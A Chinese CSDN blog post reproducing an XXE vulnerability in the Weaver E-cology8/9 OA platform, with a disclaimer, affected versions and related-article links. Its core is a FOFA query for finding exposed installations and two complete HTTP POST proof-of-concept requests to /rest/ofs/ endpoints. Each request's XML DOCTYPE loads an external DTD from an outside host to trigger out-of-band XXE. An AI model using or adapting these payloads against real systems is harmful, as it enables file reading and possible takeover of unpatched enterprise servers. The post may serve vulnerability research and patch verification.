泛微E-cology8 多接口XXE漏洞复现 [附POC]

于 2024-08-04 18:56:50 发布
阅读量239 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 系统安全 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/140909942
版权

文章目录

泛微E-cology8 多接口XXE漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。

0x03 影响版本

泛微 EC 9.x 且补丁版本 < 10.58.2
泛微 EC 8.x 且补丁版本 < 10.58.2

0x04 漏洞环境

FOFA语法:app=“泛微-OA(e-cology)”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC 1(POST)

POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/xml
Content-Length: 131

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://zuwyyvjnql.yutu.eu.org">
<M><syscode>&send;</syscode></M>

POC 2(POST)

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/xml
Content-Length: 131

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://tzcnxwantm.dgrh3.cn">
<M><syscode>&send;</syscode></M>

3.复现

注:两个poc的区别在于漏洞路径不一样
POC1:
在这里插入图片描述POC2:
在这里插入图片描述

gaynell
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【1day】复现泛微OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 2565
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
泛微E-Cology XXE漏洞复现(QVD-2023-16177)
0xSec
07-23 6219
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
【严重】泛微 e-cology <10.58.3 任意文件上传漏洞
murphysec的博客
08-04 1119
OSCS是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。泛微 e-cology 10.58.3之前版本存在任意文件上传漏洞,由于上传接口身份认证缺失,未经过身份验证的攻击者可以构造恶意请求将文件上传至服务器,攻击者可能通过上传jsp文件,从而远程执行任意命令。泛微协同管理应用平台(e-cology)是一套企业大型协同管理平台。
漏洞复现泛微OA E-Cology ofsLogin 任意用户登录漏洞
最新发布
凝聚力安全团队
07-23 417
泛微OA E-Cology ofsLogin接口存在任意用户登录漏洞,不法分子可以利用这个漏洞绕过身份验证,以任意用户身份登录系统。这样,攻击者能够访问和操作系统中的敏感数据,执行用户权限内的所有操作,甚至可能提升权限,造成数据泄露、篡改等严重安全问题。
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0
siu~
08-29 1311
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.
漏洞复现泛微OA E-cology8 SptmForPortalThumbnail.jsp 任意文件读取漏洞
凝聚力安全团队
06-19 604
泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微 e-cology8 的 SptmForPortalThumbnail.jsp 文件中的 preview 未进行安全过滤,攻击者可通过该漏洞读取泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 826
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
泛微E-Cology ProcessOverRequestByXml 任意文件读取漏洞复现
0xSec
04-11 1330
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
漏洞复现泛微e-cology9 WorkflowServiceXml SQL注入漏洞
今天是几号的博客
07-15 1584
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。漏洞名称泛微e-cology9 WorkflowServiceXml SQL注入漏洞公开时间2024-07-10威胁类型命令执行。
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 1770
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
0day 未公开 泛微E-Cology 存在源码信息泄露漏洞
weixin_43167326的博客
07-09 936
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。。
泛微E-cology8管理员后端维护手册全套
09-30
泛微E-cology8是一款企业级的协同办公自动化(OA)系统,专为现代企业管理设计,提供全面的后端维护支持。这套“泛微E-cology8管理员后端维护手册全套”涵盖了OA系统中所有后端模块的详细操作和维护指南,旨在帮助...
泛微E-cology8前端用户使用手册.rar
06-13
泛微E-cology8是一款企业级协同办公软件,它的前端用户使用手册是为帮助用户更好地理解和操作该系统而设计的。手册涵盖了泛微平台下的17个主要模块,旨在提供全面、详细的使用指南,帮助用户提高工作效率,实现企业...
泛微E-cology8前端用户使用手册全套学习资料
09-30
泛微E-cology8是一款企业级的协同办公自动化(OA)系统,专为提升组织效率、优化业务流程而设计。该系统的前端用户使用手册是一份全面的指导文档,旨在帮助管理员和普通用户熟悉并掌握其各项功能。下面,我们将详细...
泛微E-cology 二次开发Java Jar包
04-11
泛微E-cology是一款企业级协同办公软件,其二次开发功能允许用户根据自身业务需求定制化系统,以满足更深层次的管理与协作需求。在Java环境下进行泛微E-cology的二次开发,开发者通常需要使用到相关的jar包,这些jar...
漏洞预警】泛微E-Cology ofsLogin任意用户登陆漏洞
做自己喜欢的事,并将其发挥到极致!
05-17 5305
泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7894
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
泛微E-Mobile /client.do 命令执行漏洞复现
0xSec
04-04 1992
泛微E-Mobile存在命令执行漏洞,攻击者可以通过/client.do执行任意命令执行,从而获得服务器权限。
泛微e-cology8系统接口详览与配置指南
这份泛微Ecology8系统接口文档为开发者提供了一个全面的工具,让他们能够充分利用e-cology的潜力,进行高效的信息集成和流程定制。无论是初次接触的开发者还是经验丰富的技术专家,都能从中找到所需的技术支持和实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值